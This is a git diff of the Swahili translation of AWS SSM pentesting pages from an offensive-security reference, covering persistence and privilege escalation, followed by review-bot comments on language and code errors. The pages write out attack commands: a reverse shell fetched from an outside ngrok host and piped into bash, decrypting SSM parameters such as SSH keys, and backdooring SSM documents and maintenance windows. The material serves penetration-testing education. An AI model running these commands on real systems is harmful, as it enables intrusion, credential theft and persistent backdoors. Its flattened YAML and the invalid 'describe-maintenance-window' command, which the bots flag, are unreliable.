diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md index 586cd855f..75c8d7264 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md @@ -1,4 +1,4 @@ -# AWS - SSM Uendelevu +# AWS - SSM Perssitence {{#include ../../../../banners/hacktricks-training.md}} @@ -10,9 +10,9 @@ Kwa maelezo zaidi angalia: ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md {{#endref}} -### Kutumia ssm:CreateAssociation kwa uendelevu +### Kutumia ssm:CreateAssociation kwa persistence -Muovu mwenye ruhusa **`ssm:CreateAssociation`** anaweza kuunda State Manager Association ili kutekeleza amri kiotomatiki kwenye EC2 instances zinazosimamiwa na SSM. Associations hizi zinaweza kusanidiwa ziendeshwe kwa kipindi kilichowekwa, na hivyo kufaa kwa uendelevu wa aina ya backdoor bila vikao vya mwingiliano. +Mshambulizi mwenye ruhusa **`ssm:CreateAssociation`** anaweza kuunda State Manager Association ili kutekeleza kiotomatiki amri kwenye EC2 instances zinazosimamiwa na SSM. Associations hizi zinaweza kusanidiwa ili ziendeshwe kwa muda wa kawaida uliowekwa, na hivyo kuzipa matumizi ya persistence kama backdoor bila vikao vya mwingiliano. ```bash aws ssm create-association \ --name SSM-Document-Name \ 
@@ -22,6 +22,56 @@ aws ssm create-association \ --association-name association-name ``` > [!NOTE] -> Njia hii ya kudumu inafanya kazi mradi tu instance ya EC2 inasimamiwa na Systems Manager, SSM agent inakimbia, na mshambuliaji ana ruhusa ya kuunda associations. Haitegemei vikao vya kuingiliana wala idhini za wazi za `ssm:SendCommand`. **Muhimu:** parameter ya `--schedule-expression` (kwa mfano, `rate(30 minutes)`) inapaswa kuzingatia interval ya chini ya AWS ya dakika 30. Kwa utekelezaji wa papo hapo au wa mara moja, acha kabisa `--schedule-expression` — association itaendeshwa mara moja baada ya kuundwa. +> Mbinu hii ya persistence hufanya kazi mradi EC2 instance inasimamiwa na Systems Manager, SSM agent inakimbia, na mshambuliaji ana permission ya kuunda associations. Haihitaji interactive sessions au explicit `ssm:SendCommand` permissions. **Important:** parameter ya `--schedule-expression` (kwa mfano, `rate(30 minutes)`) lazima izingatie minimum interval ya AWS ya dakika 30. Kwa utekelezaji wa mara moja au wa wakati mmoja, acha `--schedule-expression` kabisa — association itatekelezwa mara moja baada ya kuundwa. + +### `ssm:UpdateDocument`, `ssm:UpdateDocumentDefaultVersion`, (`ssm:ListDocuments` | `ssm:GetDocument`) + +Mshambuliaji mwenye permissions **`ssm:UpdateDocument`** na **`ssm:UpdateDocumentDefaultVersion`** anaweza kuongeza privileges kwa kurekebisha documents zilizopo. Hii pia huruhusu persistence ndani ya hiyo document. Kwa vitendo mshambuliaji angehitaji pia **`ssm:ListDocuments`** ili kupata majina ya custom documents na ikiwa mshambuliaji anataka kuficha payload yake ndani ya document iliyopo **`ssm:GetDocument`** itakuwa muhimu pia. 
+```bash +aws ssm list-documents +aws ssm get-document --name "target-document" --document-format YAML +# You will need to specify the version you're updating +aws ssm update-document \ +--name "target-document" \ +--document-format YAML \ +--content "file://doc.yaml" \ +--document-version 1 +aws ssm update-document-default-version --name "target-document" --document-version 2 +``` +Hati ya hapa chini ni mfano wa document ambao unaweza kutumika kuandika juu ya document iliyopo. Utahitaji kuhakikisha aina ya document yako inalingana na aina ya target documents ili kuepuka issues na innvocation. Document iliyo hapa chini, kwa mfano, itafanya kazi na examples za **`ssm:SendCommand`** na **`ssm:CreateAssociation`**. +```yaml +schemaVersion: '2.2' +description: Execute commands on a Linux instance. +parameters: +commands: +type: StringList +description: "The commands to run." +displayType: textarea +mainSteps: +- action: aws:runShellScript +name: runCommands +inputs: +runCommand: +- "id > /tmp/pwn_test.txt" +``` +### `ssm:RegisterTaskWithMaintenanceWindow`, `ssm:RegisterTargetWithMaintenanceWindow`, (`ssm:DescribeMaintenanceWindows` | `ec2:DescribeInstances`) + +Mshambulizi aliye na ruhusa **`ssm:RegisterTaskWithMaintenanceWindow`** na **`ssm:RegisterTargetWithMaintenanceWindow`** anaweza kupandisha privilege kwa kwanza kusajili target mpya na maintenance window iliyopo kisha kusasisha kwa kusajili task mpya. Hii husababisha execution kwenye targets zilizopo, lakini inaweza kumruhusu mshambulizi ku-compromise compute zenye roles tofauti kwa kusajili targets mpya. Hii pia huruhusu persistence kwa sababu maintenance windows tasks hutekelezwa kwa interval iliyofafanuliwa awali wakati wa uundaji wa window. Kivitendo mshambulizi pia angehitaji **`ssm:DescribeMaintenanceWindows`** ili kupata maintenance window IDs. 
+``` bash +aws ec2 describe-instances +aws ssm describe-maintenance-window +aws ssm register-target-with-maintenance-window \ +--window-id "" \ +--resource-type "INSTANCE" \ +--targets "Key=InstanceIds,Values=" +aws ssm register-task-with-maintenance-window \ +--window-id "" \ +--task-arn "AWS-RunShellScript" \ +--task-type "RUN_COMMAND" \ +--targets "Key=WindowTargetIds,Values=" \ +--task-invocation-parameters '{ "RunCommand": { "Parameters": { "commands": ["echo test > /tmp/regtaskpwn.txt"] } } }' \ +--max-concurrency 50 \ +--max-errors 100 +``` {{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md index de633c740..cb4fdf49a 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md @@ -4,7 +4,7 @@ ## SSM -Kwa taarifa zaidi kuhusu SSM angalia: +Kwa maelezo zaidi kuhusu SSM angalia: {{#ref}} ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ @@ -12,7 +12,7 @@ Kwa taarifa zaidi kuhusu SSM angalia: ### `ssm:SendCommand` -Mshambuliaji mwenye ruhusa **`ssm:SendCommand`** anaweza **kutekeleza amri kwenye instances** zinazokimbia Amazon SSM Agent na **kudhoofisha IAM Role** inayokimbia ndani yake. +Mshambuliaji mwenye ruhusa **`ssm:SendCommand`** anaweza **kutekeleza commands kwenye instances** zinazoendesha Amazon SSM Agent na **kudhibiti IAM Role** inayotekelezwa ndani yake. ```bash # Check for configured instances aws ssm describe-instance-information 
@@ -23,7 +23,7 @@ aws ssm send-command --instance-ids "$INSTANCE_ID" \ --document-name "AWS-RunShellScript" --output text \ --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash" ``` -Iwapo unatumia mbinu hii kuinua ruhusa ndani ya EC2 instance ambayo tayari imevamiwa, unaweza kukamata rev shell mahali hapa kwa kutumia: +Ikiwa unatumia mbinu hii ili kupandisha privilege ndani ya EC2 instance ambayo tayari imecompromise, unaweza tu kukamata rev shell locally kwa: ```bash # If you are in the machine you can capture the reverseshel inside of it nc -lvnp 4444 #Inside the EC2 instance @@ -31,11 +31,11 @@ aws ssm send-command --instance-ids "$INSTANCE_ID" \ --document-name "AWS-RunShellScript" --output text \ --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash" ``` -**Athari Inayowezekana:** Privesc ya moja kwa moja kwa EC2 IAM roles zilizoambatishwa kwa instances zinazoendesha SSM Agents. +**Athari Inayowezekana:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. ### `ssm:StartSession` -Mshambulizi mwenye ruhusa **`ssm:StartSession`** anaweza **kuanzisha kikao kinachofanana na SSH katika instances** zinazoendesha Amazon SSM Agent na **kupata udhibiti wa IAM Role** inayokimbia ndani yake. +Mshambuliaji mwenye ruhusa **`ssm:StartSession`** anaweza **kuanzisha session inayofanana na SSH katika instances** zinazoendesha Amazon SSM Agent na **kuathiri IAM Role** inayoendeshwa ndani yake. ```bash # Check for configured instances aws ssm describe-instance-information 
@@ -45,25 +45,25 @@ aws ssm describe-sessions --state Active aws ssm start-session --target "$INSTANCE_ID" ``` > [!CAUTION] -> Ili kuanza kikao unahitaji **SessionManagerPlugin** imewekwa: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) -> -> **Athari Inayowezekana:** Privesc ya moja kwa moja kwa EC2 IAM roles zilizounganishwa na instances zinazoendesha na SSM Agents. -> -> #### Privesc kwa ECS -> -> When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.\ -> Kulingana na [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) hii inafanywa kwa kuunda chaneli salama kati ya kifaa unachotumia kuanzisha amri ya “_exec_” na container lengwa kwa kutumia SSM Session Manager. (SSM Session Manager Plugin inahitajika ili hii ifanye kazi)\ -> Kwa hivyo, watumiaji walio na `ssm:StartSession` wataweza **kupata shell ndani ya ECS tasks** ikiwa chaguo hilo limewezeshwa kwa kukimbia tu: +> Ili kuanzisha session unahitaji **SessionManagerPlugin** ikiwa imewekwa: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) + +**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. 
+ +#### Privesc to ECS + +Wakati **ECS tasks** zinaendeshwa na **`ExecuteCommand` enabled** users wenye permissions za kutosha wanaweza kutumia `ecs execute-command` ili **execute a command** ndani ya container.\ +Kulingana na [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) hii inafanywa kwa kuunda secure channel kati ya device unayotumia kuanzisha “_exec_“ command na target container kwa kutumia SSM Session Manager. (SSM Session Manager Plugin necesary for this to work)\ +Hivyo, users wenye `ssm:StartSession` wataweza **get a shell inside ECS tasks** zikiwa na option hiyo enabled kwa kuendesha tu: ```bash aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID" ``` ![](<../../../images/image (185).png>) -**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa `ECS`IAM roles zilizoambatishwa kwenye running tasks zilizo na `ExecuteCommand` imewezeshwa. +**Athari Inayowezekana:** Privesc ya moja kwa moja kwa `ECS`IAM roles zilizoambatishwa kwa running tasks zilizo na `ExecuteCommand` enabled. ### `ssm:ResumeSession` -Mshambuliaji aliye na ruhusa **`ssm:ResumeSession`** anaweza re-**start a SSH like session in instances** zinazokimbia Amazon SSM Agent zikiwa na hali ya kikao cha SSM **disconnected** na **compromise the IAM Role** inayokimbia ndani yake. +Shambulizi mwenye permission **`ssm:ResumeSession`** anaweza ku-**re-start a SSH like session in instances** zinazokiendesha Amazon SSM Agent zikiwa na hali ya **disconnected** ya SSM session na **kucompromise IAM Role** inayokimbia ndani yake. ```bash # Check for configured instances aws ssm describe-sessions 
@@ -72,30 +72,30 @@ aws ssm describe-sessions aws ssm resume-session \ --session-id Mary-Major-07a16060613c408b5 ``` -**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa EC2 IAM roles zilizoambatanishwa na instances zinazoendesha zenye SSM Agents na sessions zilizokatika. +**Athari Inayoweza Kutokea:** Direct privesc kwa EC2 IAM roles zilizounganishwa na running instances zenye SSM Agents zinazofanya kazi na disconected sessions. ### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`) -An attacker mwenye ruhusa zilizotajwa ataweza kuorodhesha **SSM parameters** na **kusoma kwa clear-text**. Kwenye parameters hizi mara nyingi unaweza **kupata taarifa nyeti** kama SSH keys au API keys. +Mshambuliaji mwenye permissions zilizotajwa ataweza kuorodhesha **SSM parameters** na **kuzisoma kwa clear-text**. Katika parameters hizi unaweza mara nyingi **kupata sensitive information** kama SSH keys au API keys. ```bash aws ssm describe-parameters # Suppose that you found a parameter called "id_rsa" aws ssm get-parameters --names id_rsa --with-decryption aws ssm get-parameter --name id_rsa --with-decryption ``` -**Potential Impact:** Pata taarifa nyeti ndani ya vigezo. +**Athari Inayowezekana:** Pata taarifa nyeti ndani ya parameters. ### `ssm:ListCommands` -Mshambulizi mwenye ruhusa hii anaweza kuorodhesha **amri** zote zilizotumwa na, kwa matumaini, kupata **taarifa nyeti** ndani yao. +Mshambulizi aliye na ruhusa hii anaweza kuorodhesha **commands** zote zilizotumwa na kwa matumaini apate **taarifa nyeti** ndani yake. ``` aws ssm list-commands ``` -**Athari Inayoweza Kutokea:** Kupata taarifa nyeti ndani ya command lines. +**Athari Inayowezekana:** Pata taarifa nyeti ndani ya command lines. ### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`) -Mshambuliaji mwenye ruhusa hizi anaweza kuorodhesha zote **commands** zilizotumwa na **kusoma output** iliyotolewa, akiwa na matumaini ya kupata **taarifa nyeti** ndani yake. 
+Mshambuliaji mwenye permissions hizi anaweza kuorodhesha **commands** zote zilizotumwa na **kusoma output** iliyozalishwa, kwa matumaini ya kupata **taarifa nyeti** ndani yake. ```bash # You can use any of both options to get the command-id and instance id aws ssm list-commands @@ -103,11 +103,11 @@ aws ssm list-command-invocations aws ssm get-command-invocation --command-id --instance-id ``` -**Athari Inayoweza Kutokea:** Pata taarifa nyeti ndani ya matokeo ya mistari ya amri. +**Athari Inayowezekana:** Pata taarifa nyeti ndani ya output ya command lines. ### Kutumia ssm:CreateAssociation -Mshambuliaji mwenye ruhusa **`ssm:CreateAssociation`** anaweza kuunda State Manager Association ili kutekeleza amri kiotomatiki kwenye EC2 instances zinazosimamiwa na SSM. Associations hizi zinaweza kusanidiwa zifanye kazi kwa vipindi vilivyowekwa, zikifanya ziwe zenyefaa kwa backdoor-like persistence bila interactive sessions. +Attacker mwenye permission **`ssm:CreateAssociation`** anaweza kucreate State Manager Association ili automatically execute commands kwenye EC2 instances zinazosimamiwa na SSM. Hizi associations zinaweza kusanidiwa ku run kwa fixed interval, jambo linalozifanya zinafaa kwa backdoor-like persistence bila interactive sessions. ```bash aws ssm create-association \ --name SSM-Document-Name \ 
@@ -117,11 +117,60 @@ aws ssm create-association \ --association-name association-name ``` > [!NOTE] -> Njia hii ya persistence hufanya kazi mradi EC2 instance inasimamiwa na Systems Manager, SSM agent inafanya kazi, na mshambuliaji ana ruhusa ya create associations. Haitegemei interactive sessions wala ruhusa wazi za ssm:SendCommand. **Muhimu:** Parameter ya `--schedule-expression` (kwa mfano, `rate(30 minutes)`) lazima iheshimu muda wa chini wa AWS wa dakika 30. Kwa utekelezaji wa haraka au mara moja, usitumie kabisa `--schedule-expression` — association itatekelezwa mara moja baada ya uundaji. +> Njia hii ya persistence hufanya kazi mradi EC2 instance inasimamiwa na Systems Manager, SSM agent inafanya kazi, na attacker ana permission ya ku create associations. Haihitaji interactive sessions au explicit ssm:SendCommand permissions. **Important:** Parameter `--schedule-expression` (k.m. `rate(30 minutes)`) lazima iheshimu minimum interval ya AWS ya dakika 30. Kwa immediate au one-time execution, acha `--schedule-expression` kabisa — association itatekelezwa mara moja baada ya creation. +### `ssm:UpdateDocument`, `ssm:UpdateDocumentDefaultVersion`, (`ssm:ListDocuments` | `ssm:GetDocument`) + +Attacker aliye na permissions **`ssm:UpdateDocument`** na **`ssm:UpdateDocumentDefaultVersion`** anaweza ku escalate privileges kwa kurekebisha existing documents. Hii pia inaruhusu persistence ndani ya document hiyo. Kwa vitendo attacker pia angehitaji **`ssm:ListDocuments`** ili kupata majina ya custom documents na kama attacker anataka ku obfuscate payload yake ndani ya existing document **`ssm:GetDocument`** itakuwa necessary pia. 
+```bash +aws ssm list-documents +aws ssm get-document --name "target-document" --document-format YAML +# You will need to specify the version you're updating +aws ssm update-document \ +--name "target-document" \ +--document-format YAML \ +--content "file://doc.yaml" \ +--document-version 1 +aws ssm update-document-default-version --name "target-document" --document-version 2 +``` +Hapa chini ni mfano wa document unaoweza kutumika ku-overwrite document iliyopo. Utahitaji kuhakikisha aina ya document yako inalingana na aina ya document lengwa ili kuepuka issues na innvocation. Document hapa chini kwa mfano itakuwa na mfano wa **`ssm:SendCommand`** na **`ssm:CreateAssociation`**. +```yaml +schemaVersion: '2.2' +description: Execute commands on a Linux instance. +parameters: +commands: +type: StringList +description: "The commands to run." +displayType: textarea +mainSteps: +- action: aws:runShellScript +name: runCommands +inputs: +runCommand: +- "id > /tmp/pwn_test.txt" +``` +### `ssm:RegisterTaskWithMaintenanceWindow`, `ssm:RegisterTargetWithMaintenanceWindow`, (`ssm:DescribeMaintenanceWindows` | `ec2:DescribeInstances`) + +Mshambuliaji mwenye ruhusa **`ssm:RegisterTaskWithMaintenanceWindow`** na **`ssm:RegisterTargetWithMaintenanceWindow`** anaweza kuongeza privileges kwa kwanza kusajili target mpya kwenye maintenance window iliyopo kisha kusasisha kwa kusajili task mpya. Hii inafanikisha execution kwenye existing targets, lakini inaweza kumruhusu mshambuliaji ku-compromise compute zenye roles tofauti kwa kusajili new targets. Hii pia huruhusu persistence kwa sababu maintenance windows tasks zina-execute kwa interval iliyofafanuliwa awali wakati wa uundaji wa window. Kivitendo mshambuliaji pia angehitaji **`ssm:DescribeMaintenanceWindows`** ili kupata maintenance window IDs. 
+``` bash +aws ec2 describe-instances +aws ssm describe-maintenance-window +aws ssm register-target-with-maintenance-window \ +--window-id "" \ +--resource-type "INSTANCE" \ +--targets "Key=InstanceIds,Values=" +aws ssm register-task-with-maintenance-window \ +--window-id "" \ +--task-arn "AWS-RunShellScript" \ +--task-type "RUN_COMMAND" \ +--targets "Key=WindowTargetIds,Values=" \ +--task-invocation-parameters '{ "RunCommand": { "Parameters": { "commands": ["echo test > /tmp/regtaskpwn.txt"] } } }' \ +--max-concurrency 50 \ +--max-errors 100 +``` ### Codebuild -Unaweza pia kutumia SSM kuingia ndani ya mradi wa codebuild unaojengwa: +Unaweza pia kutumia SSM kuingia ndani ya codebuild project inayojengwa: {{#ref}} ../aws-codebuild-privesc/README.md
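Review bot: the new title in the `@@ -1,4 +1,4 @@` hunk of `aws-ssm-persistence/README.md` introduces a typo, `# AWS - SSM Perssitence`; since the rest of this diff standardises on the English loanword for the heading and section names, it should read `# AWS - SSM Persistence`.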
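Review bot: in the `@@ -22,6 +22,56 @@` hunk of `aws-ssm-persistence/README.md` the enumeration command `aws ssm describe-maintenance-window` does not match the API action the heading names (`ssm:DescribeMaintenanceWindows`); the AWS CLI subcommand is the plural `aws ssm describe-maintenance-windows`, so the line as written will not run. In the same hunk the YAML document is shown with every key at column 0 (`parameters:`, `commands:`, `type: StringList`, `name: runCommands`, `runCommand:` all unindented), which is not valid SSM document YAML; please restore the nesting (`commands` under `parameters`, its `type`/`description`/`displayType` under `commands`, `name` and `inputs` under the `- action` item, `runCommand` under `inputs`). Also fix `innvocation` to `invocation`, and open the maintenance-window block with the same fence the rest of the file uses (three backticks immediately followed by `bash`, without the space that this hunk inserts).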
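Review bot: in the `@@ -31,11 +31,11 @@` hunk of `aws-ssm-privesc/README.md` the impact line now mixes languages: the label stays Swahili (`**Athari Inayowezekana:**`) but the sentence after it is replaced with untranslated English, `Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.`; the removed line was a complete Swahili sentence, so either keep it or translate the whole line consistently.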
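Review bot: in the `@@ -45,25 +45,25 @@` hunk of `aws-ssm-privesc/README.md` moving the impact line and the ECS subsection out of the `[!CAUTION]` blockquote is the right call, but the label is left as the English `**Potential Impact:**` while the rest of the page uses `**Athari Inayowezekana:**`, and the added text still carries the source typo `necesary` (should be `necessary`) plus two Swahili errors in the `ssm:ResumeSession` paragraph, `Shambulizi` (should be `Mshambulizi`) and `zinazokiendesha` (should be `zinazoendesha`).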
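Review bot: in the `@@ -72,30 +72,30 @@` hunk of `aws-ssm-privesc/README.md` the replacement impact line ends with `... SSM Agents zinazofanya kazi na disconected sessions.`; `disconected` is misspelled (`disconnected`), and after this hunk the page uses both `Athari Inayoweza Kutokea` and `Athari Inayowezekana` for the same label, so one form should be chosen throughout.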
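Review bot: in the `@@ -103,11 +103,11 @@` hunk of `aws-ssm-privesc/README.md` the rewritten `ssm:CreateAssociation` paragraph (`Attacker mwenye permission ... anaweza kucreate ... ku run kwa fixed interval`) reads as word-by-word code-switching rather than Swahili prose; the removed line was grammatical, so prefer keeping its verbs (`kuunda`, `kutekeleza`, `zifanye kazi`) and borrowing only the technical nouns.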
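Review bot: the `@@ -117,11 +117,60 @@` hunk of `aws-ssm-privesc/README.md` pastes the same `ssm:UpdateDocument` and maintenance-window sections as the persistence page and so inherits the same defects: `aws ssm describe-maintenance-window` should be `aws ssm describe-maintenance-windows`, the YAML document has lost its nesting indentation, `innvocation` is misspelled, and the second fence has a space between the backticks and `bash`. Two points specific to this hunk: the `+### \`ssm:UpdateDocument\`...` heading is added directly after the `> [!NOTE]` line with no blank line between them, unlike the persistence page, which inserts a `+` blank line first; and the sentence `Document hapa chini kwa mfano itakuwa na mfano wa **\`ssm:SendCommand\`** na **\`ssm:CreateAssociation\`**` ("will contain an example of") changes the meaning of the persistence-page wording, which says the document will work with those examples (`itafanya kazi na`).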